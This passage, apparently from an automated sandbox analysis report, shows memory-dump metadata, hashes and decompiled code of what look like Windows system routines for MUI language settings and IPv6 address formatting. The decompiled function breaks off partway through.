                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                            • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                            • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                            • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                                                                            • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                                                                                                                            • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                                                                            • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E00978788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				short* _v12;
                                                                                                                                                            				void* _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				char _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				char _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				char _v68;
                                                                                                                                                            				void* _t216;
                                                                                                                                                            				intOrPtr _t231;
                                                                                                                                                            				short* _t235;
                                                                                                                                                            				intOrPtr _t257;
                                                                                                                                                            				short* _t261;
                                                                                                                                                            				intOrPtr _t284;
                                                                                                                                                            				intOrPtr _t288;
                                                                                                                                                            				void* _t314;
                                                                                                                                                            				signed int _t318;
                                                                                                                                                            				short* _t319;
                                                                                                                                                            				intOrPtr _t321;
                                                                                                                                                            				void* _t328;
                                                                                                                                                            				void* _t329;
                                                                                                                                                            				char* _t332;
                                                                                                                                                            				signed int _t333;
                                                                                                                                                            				signed int* _t334;
                                                                                                                                                            				void* _t335;
                                                                                                                                                            				void* _t338;
                                                                                                                                                            				void* _t339;
                                                                                                                                                            
                                                                                                                                                            				_t328 = __edx;
                                                                                                                                                            				_t322 = __ecx;
                                                                                                                                                            				_t318 = 0;
                                                                                                                                                            				_t334 = _a4;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_v48 = 0;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				_v40 = 0;
                                                                                                                                                            				_v32 = 0;
                                                                                                                                                            				_v52 = 0;
                                                                                                                                                            				if(_t334 == 0) {
                                                                                                                                                            					_t329 = 0xc000000d;
                                                                                                                                                            					L49:
                                                                                                                                                            					_t334[0x11] = _v56;
                                                                                                                                                            					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                            					_t334[0x12] = _v60;
                                                                                                                                                            					_t334[0x13] = _v28;
                                                                                                                                                            					_t334[0x17] = _v20;
                                                                                                                                                            					_t334[0x16] = _v48;
                                                                                                                                                            					_t334[0x18] = _v40;
                                                                                                                                                            					_t334[0x14] = _v32;
                                                                                                                                                            					_t334[0x15] = _v52;
                                                                                                                                                            					return _t329;
                                                                                                                                                            				}
                                                                                                                                                            				_v56 = 0;
                                                                                                                                                            				if(E00978460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                            					_v56 = 1;
                                                                                                                                                            					if(_v8 != 0) {
                                                                                                                                                            						_t207 = E0095E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                            					}
                                                                                                                                                            					_push(1);
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					E0097718A(_t207);
                                                                                                                                                            					_t335 = _t335 + 4;
                                                                                                                                                            				}
                                                                                                                                                            				_v60 = _v60 | 0xffffffff;
                                                                                                                                                            				if(E00978460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                            					_t333 =  *_v8;
                                                                                                                                                            					_v60 = _t333;
                                                                                                                                                            					_t314 = E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            					_push(_t333);
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					E0097718A(_t314);
                                                                                                                                                            					_t335 = _t335 + 4;
                                                                                                                                                            				}
                                                                                                                                                            				_t216 = E00978460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                            				_t332 = ";";
                                                                                                                                                            				if(_t216 < 0) {
                                                                                                                                                            					L17:
                                                                                                                                                            					if(E00978460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                            						L30:
                                                                                                                                                            						if(E00978460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                            							L46:
                                                                                                                                                            							_t329 = 0;
                                                                                                                                                            							L47:
                                                                                                                                                            							if(_v8 != _t318) {
                                                                                                                                                            								E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            							}
                                                                                                                                                            							if(_v28 != _t318) {
                                                                                                                                                            								if(_v20 != _t318) {
                                                                                                                                                            									E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                            									_v20 = _t318;
                                                                                                                                                            									_v40 = _t318;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							goto L49;
                                                                                                                                                            						}
                                                                                                                                                            						_t231 = _v24;
                                                                                                                                                            						_t322 = _t231 + 4;
                                                                                                                                                            						_push(_t231);
                                                                                                                                                            						_v52 = _t322;
                                                                                                                                                            						E0097718A(_t231);
                                                                                                                                                            						if(_t322 == _t318) {
                                                                                                                                                            							_v32 = _t318;
                                                                                                                                                            						} else {
                                                                                                                                                            							_v32 = E0095E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            						}
                                                                                                                                                            						if(_v32 == _t318) {
                                                                                                                                                            							_v52 = _t318;
                                                                                                                                                            							L58:
                                                                                                                                                            							_t329 = 0xc0000017;
                                                                                                                                                            							goto L47;
                                                                                                                                                            						} else {
                                                                                                                                                            							E00952340(_v32, _v8, _v24);
                                                                                                                                                            							_v16 = _v32;
                                                                                                                                                            							_a4 = _t318;
                                                                                                                                                            							_t235 = E0096E679(_v32, _t332);
                                                                                                                                                            							while(1) {
                                                                                                                                                            								_t319 = _t235;
                                                                                                                                                            								if(_t319 == 0) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								 *_t319 = 0;
                                                                                                                                                            								_t321 = _t319 + 2;
                                                                                                                                                            								E0095E2A8(_t322,  &_v68, _v16);
                                                                                                                                                            								if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            									_a4 = _a4 + 1;
                                                                                                                                                            								}
                                                                                                                                                            								_v16 = _t321;
                                                                                                                                                            								_t235 = E0096E679(_t321, _t332);
                                                                                                                                                            								_pop(_t322);
                                                                                                                                                            							}
                                                                                                                                                            							_t236 = _v16;
                                                                                                                                                            							if( *_v16 != _t319) {
                                                                                                                                                            								E0095E2A8(_t322,  &_v68, _t236);
                                                                                                                                                            								if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            									_a4 = _a4 + 1;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							if(_a4 == 0) {
                                                                                                                                                            								E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                            								_v52 = _v52 & 0x00000000;
                                                                                                                                                            								_v32 = _v32 & 0x00000000;
                                                                                                                                                            							}
                                                                                                                                                            							if(_v8 != 0) {
                                                                                                                                                            								E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                            							}
                                                                                                                                                            							_v8 = _v8 & 0x00000000;
                                                                                                                                                            							_t318 = 0;
                                                                                                                                                            							goto L46;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t257 = _v24;
                                                                                                                                                            					_t322 = _t257 + 4;
                                                                                                                                                            					_push(_t257);
                                                                                                                                                            					_v40 = _t322;
                                                                                                                                                            					E0097718A(_t257);
                                                                                                                                                            					_t338 = _t335 + 4;
                                                                                                                                                            					if(_t322 == _t318) {
                                                                                                                                                            						_v20 = _t318;
                                                                                                                                                            					} else {
                                                                                                                                                            						_v20 = E0095E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            					}
                                                                                                                                                            					if(_v20 == _t318) {
                                                                                                                                                            						_v40 = _t318;
                                                                                                                                                            						goto L58;
                                                                                                                                                            					} else {
                                                                                                                                                            						E00952340(_v20, _v8, _v24);
                                                                                                                                                            						_v16 = _v20;
                                                                                                                                                            						_a4 = _t318;
                                                                                                                                                            						_t261 = E0096E679(_v20, _t332);
                                                                                                                                                            						_t335 = _t338 + 0x14;
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_v12 = _t261;
                                                                                                                                                            							if(_t261 == _t318) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_v12 = _v12 + 2;
                                                                                                                                                            							 *_v12 = 0;
                                                                                                                                                            							E0095E2A8(_v12,  &_v68, _v16);
                                                                                                                                                            							if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            								_a4 = _a4 + 1;
                                                                                                                                                            							}
                                                                                                                                                            							_v16 = _v12;
                                                                                                                                                            							_t261 = E0096E679(_v12, _t332);
                                                                                                                                                            							_pop(_t322);
                                                                                                                                                            						}
                                                                                                                                                            						_t269 = _v16;
                                                                                                                                                            						if( *_v16 != _t318) {
                                                                                                                                                            							E0095E2A8(_t322,  &_v68, _t269);
                                                                                                                                                            							if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            								_a4 = _a4 + 1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_a4 == _t318) {
                                                                                                                                                            							E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                            							_v40 = _t318;
                                                                                                                                                            							_v20 = _t318;
                                                                                                                                                            						}
                                                                                                                                                            						if(_v8 != _t318) {
                                                                                                                                                            							E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            						}
                                                                                                                                                            						_v8 = _t318;
                                                                                                                                                            						goto L30;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				_t284 = _v24;
                                                                                                                                                            				_t322 = _t284 + 4;
                                                                                                                                                            				_push(_t284);
                                                                                                                                                            				_v48 = _t322;
                                                                                                                                                            				E0097718A(_t284);
                                                                                                                                                            				_t339 = _t335 + 4;
                                                                                                                                                            				if(_t322 == _t318) {
                                                                                                                                                            					_v28 = _t318;
                                                                                                                                                            				} else {
                                                                                                                                                            					_v28 = E0095E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            				}
                                                                                                                                                            				if(_v28 == _t318) {
                                                                                                                                                            					_v48 = _t318;
                                                                                                                                                            					goto L58;
                                                                                                                                                            				} else {
                                                                                                                                                            					E00952340(_v28, _v8, _v24);
                                                                                                                                                            					_v16 = _v28;
                                                                                                                                                            					_a4 = _t318;
                                                                                                                                                            					_t288 = E0096E679(_v28, _t332);
                                                                                                                                                            					_t335 = _t339 + 0x14;
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_v12 = _t288;
                                                                                                                                                            						if(_t288 == _t318) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						_v12 = _v12 + 2;
                                                                                                                                                            						 *_v12 = 0;
                                                                                                                                                            						E0095E2A8(_v12,  &_v68, _v16);
                                                                                                                                                            						if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            							_a4 = _a4 + 1;
                                                                                                                                                            						}
                                                                                                                                                            						_v16 = _v12;
                                                                                                                                                            						_t288 = E0096E679(_v12, _t332);
                                                                                                                                                            						_pop(_t322);
                                                                                                                                                            					}
                                                                                                                                                            					_t296 = _v16;
                                                                                                                                                            					if( *_v16 != _t318) {
                                                                                                                                                            						E0095E2A8(_t322,  &_v68, _t296);
                                                                                                                                                            						if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            							_a4 = _a4 + 1;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					if(_a4 == _t318) {
                                                                                                                                                            						E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                            						_v48 = _t318;
                                                                                                                                                            						_v28 = _t318;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v8 != _t318) {
                                                                                                                                                            						E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            					}
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					goto L17;
                                                                                                                                                            				}
                                                                                                                                                            			}





































                                                                                                                                                            0x0097880f
                                                                                                                                                            0x00978810
                                                                                                                                                            0x00978813
                                                                                                                                                            0x00978818
                                                                                                                                                            0x00978818
                                                                                                                                                            0x0097882c
                                                                                                                                                            0x00978831
                                                                                                                                                            0x00978838
                                                                                                                                                            0x00978908
                                                                                                                                                            0x00978920
                                                                                                                                                            0x009789f0
                                                                                                                                                            0x00978a08
                                                                                                                                                            0x00978af6
                                                                                                                                                            0x00978af6
                                                                                                                                                            0x00978af8
                                                                                                                                                            0x00978afb
                                                                                                                                                            0x009c1beb
                                                                                                                                                            0x009c1beb
                                                                                                                                                            0x00978b04
                                                                                                                                                            0x009c1bf8
                                                                                                                                                            0x009c1c0e
                                                                                                                                                            0x009c1c13
                                                                                                                                                            0x009c1c16
                                                                                                                                                            0x009c1c16
                                                                                                                                                            0x009c1bf8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978b04
                                                                                                                                                            0x00978a0e
                                                                                                                                                            0x00978a11
                                                                                                                                                            0x00978a14
                                                                                                                                                            0x00978a15
                                                                                                                                                            0x00978a18
                                                                                                                                                            0x00978a22
                                                                                                                                                            0x00978b59
                                                                                                                                                            0x00978a28
                                                                                                                                                            0x00978a3c
                                                                                                                                                            0x00978a3c
                                                                                                                                                            0x00978a42
                                                                                                                                                            0x009c1bb0
                                                                                                                                                            0x009c1b11
                                                                                                                                                            0x009c1b11
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978a48
                                                                                                                                                            0x00978a51
                                                                                                                                                            0x00978a5b
                                                                                                                                                            0x00978a5e
                                                                                                                                                            0x00978a61
                                                                                                                                                            0x00978a69
                                                                                                                                                            0x00978a69
                                                                                                                                                            0x00978a6d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978a74
                                                                                                                                                            0x00978a7c
                                                                                                                                                            0x00978a7d
                                                                                                                                                            0x00978a91
                                                                                                                                                            0x00978a93
                                                                                                                                                            0x00978a93
                                                                                                                                                            0x00978a98
                                                                                                                                                            0x00978a9b
                                                                                                                                                            0x00978aa1
                                                                                                                                                            0x00978aa1
                                                                                                                                                            0x00978aa4
                                                                                                                                                            0x00978aaa
                                                                                                                                                            0x00978ab1
                                                                                                                                                            0x00978ac5
                                                                                                                                                            0x00978ac7
                                                                                                                                                            0x00978ac7
                                                                                                                                                            0x00978ac5
                                                                                                                                                            0x00978ace
                                                                                                                                                            0x009c1bc9
                                                                                                                                                            0x009c1bce
                                                                                                                                                            0x009c1bd2
                                                                                                                                                            0x009c1bd2
                                                                                                                                                            0x00978ad8
                                                                                                                                                            0x00978aeb
                                                                                                                                                            0x00978aeb
                                                                                                                                                            0x00978af0
                                                                                                                                                            0x00978af4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978af4
                                                                                                                                                            0x00978a42
                                                                                                                                                            0x00978926
                                                                                                                                                            0x00978929
                                                                                                                                                            0x0097892c
                                                                                                                                                            0x0097892d
                                                                                                                                                            0x00978930
                                                                                                                                                            0x00978935
                                                                                                                                                            0x0097893a
                                                                                                                                                            0x00978b51
                                                                                                                                                            0x00978940
                                                                                                                                                            0x00978954
                                                                                                                                                            0x00978954
                                                                                                                                                            0x0097895a
                                                                                                                                                            0x009c1b63
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978960
                                                                                                                                                            0x00978969
                                                                                                                                                            0x00978973
                                                                                                                                                            0x00978976
                                                                                                                                                            0x00978979
                                                                                                                                                            0x0097897e
                                                                                                                                                            0x00978981
                                                                                                                                                            0x00978981
                                                                                                                                                            0x00978986
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1b6e
                                                                                                                                                            0x009c1b74
                                                                                                                                                            0x009c1b7b
                                                                                                                                                            0x009c1b8f
                                                                                                                                                            0x009c1b91
                                                                                                                                                            0x009c1b91
                                                                                                                                                            0x009c1b99
                                                                                                                                                            0x009c1b9c
                                                                                                                                                            0x009c1ba2
                                                                                                                                                            0x009c1ba2
                                                                                                                                                            0x0097898c
                                                                                                                                                            0x00978992
                                                                                                                                                            0x00978999
                                                                                                                                                            0x009789ad
                                                                                                                                                            0x009c1ba8
                                                                                                                                                            0x009c1ba8
                                                                                                                                                            0x009789ad
                                                                                                                                                            0x009789b6
                                                                                                                                                            0x009789c8
                                                                                                                                                            0x009789cd
                                                                                                                                                            0x009789d0
                                                                                                                                                            0x009789d0
                                                                                                                                                            0x009789d6
                                                                                                                                                            0x009789e8
                                                                                                                                                            0x009789e8
                                                                                                                                                            0x009789ed
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009789ed
                                                                                                                                                            0x0097895a
                                                                                                                                                            0x0097883e
                                                                                                                                                            0x00978841
                                                                                                                                                            0x00978844
                                                                                                                                                            0x00978845
                                                                                                                                                            0x00978848
                                                                                                                                                            0x0097884d
                                                                                                                                                            0x00978852
                                                                                                                                                            0x00978b49
                                                                                                                                                            0x00978858
                                                                                                                                                            0x0097886c
                                                                                                                                                            0x0097886c
                                                                                                                                                            0x00978872
                                                                                                                                                            0x009c1b0e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978878
                                                                                                                                                            0x00978881
                                                                                                                                                            0x0097888b
                                                                                                                                                            0x0097888e
                                                                                                                                                            0x00978891
                                                                                                                                                            0x00978896
                                                                                                                                                            0x00978899
                                                                                                                                                            0x00978899
                                                                                                                                                            0x0097889e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1b21
                                                                                                                                                            0x009c1b27
                                                                                                                                                            0x009c1b2e
                                                                                                                                                            0x009c1b42
                                                                                                                                                            0x009c1b44
                                                                                                                                                            0x009c1b44
                                                                                                                                                            0x009c1b4c

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            • Kernel-MUI-Language-SKU, xrefs: 009789FC
                                                                                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 00978827
                                                                                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 009787E6
                                                                                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 00978914
                                                                                                                                                            • WindowsExcludedProcs, xrefs: 009787C1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcspbrk
                                                                                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                            • API String ID: 402402107-258546922
                                                                                                                                                            • Opcode ID: e28719b9ac9e55a38b8e3b4b7351be63a4fdd062ac6634f669eaa913cb52294c
                                                                                                                                                            • Instruction ID: 1aa689d0bdbe2e35e6529a82357ebe125fcac06d02e8fa3c01f52588cafe3b34
                                                                                                                                                            • Opcode Fuzzy Hash: e28719b9ac9e55a38b8e3b4b7351be63a4fdd062ac6634f669eaa913cb52294c
                                                                                                                                                            • Instruction Fuzzy Hash: 25F116B2D00209EFCF15DFA5C985EEEB7B9FF48300F10846AE509A7211EB359A45DB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                            			E009913CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                            				signed int _t78;
                                                                                                                                                            				signed int _t86;
                                                                                                                                                            				char _t90;
                                                                                                                                                            				signed int _t91;
                                                                                                                                                            				signed int _t96;
                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                            				signed int _t114;
                                                                                                                                                            				void* _t115;
                                                                                                                                                            				intOrPtr _t128;
                                                                                                                                                            				intOrPtr* _t129;
                                                                                                                                                            				void* _t130;
                                                                                                                                                            
                                                                                                                                                            				_t129 = _a4;
                                                                                                                                                            				_t128 = _a8;
                                                                                                                                                            				_t116 = 0;
                                                                                                                                                            				_t71 = _t128 + 0x5c;
                                                                                                                                                            				_v8 = 8;
                                                                                                                                                            				_v20 = _t71;
                                                                                                                                                            				if( *_t129 == 0) {
                                                                                                                                                            					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                            						goto L5;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                            						if(_t96 != 0) {
                                                                                                                                                            							L38:
                                                                                                                                                            							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                            								goto L5;
                                                                                                                                                            							} else {
                                                                                                                                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            								_t86 = E00987707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                            								L36:
                                                                                                                                                            								return _t128 + _t86 * 2;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                            						if(_t114 == 0) {
                                                                                                                                                            							L33:
                                                                                                                                                            							_t115 = 0x952926;
                                                                                                                                                            							L35:
                                                                                                                                                            							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                            							_t86 = E00987707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                            							goto L36;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t114 != 0xffff) {
                                                                                                                                                            							_t116 = 0;
                                                                                                                                                            							goto L38;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t114 != 0) {
                                                                                                                                                            							_t115 = 0x959cac;
                                                                                                                                                            							goto L35;
                                                                                                                                                            						}
                                                                                                                                                            						goto L33;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L5:
                                                                                                                                                            					_a8 = _t116;
                                                                                                                                                            					_a4 = _t116;
                                                                                                                                                            					_v12 = _t116;
                                                                                                                                                            					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                            						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                            							_v8 = 6;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t90 = _v8;
                                                                                                                                                            					if(_t90 <= _t116) {
                                                                                                                                                            						L11:
                                                                                                                                                            						if(_a8 - _a4 <= 1) {
                                                                                                                                                            							_a8 = _t116;
                                                                                                                                                            							_a4 = _t116;
                                                                                                                                                            						}
                                                                                                                                                            						_t91 = 0;
                                                                                                                                                            						if(_v8 <= _t116) {
                                                                                                                                                            							L22:
                                                                                                                                                            							if(_v8 < 8) {
                                                                                                                                                            								_push( *(_t129 + 0xf) & 0x000000ff);
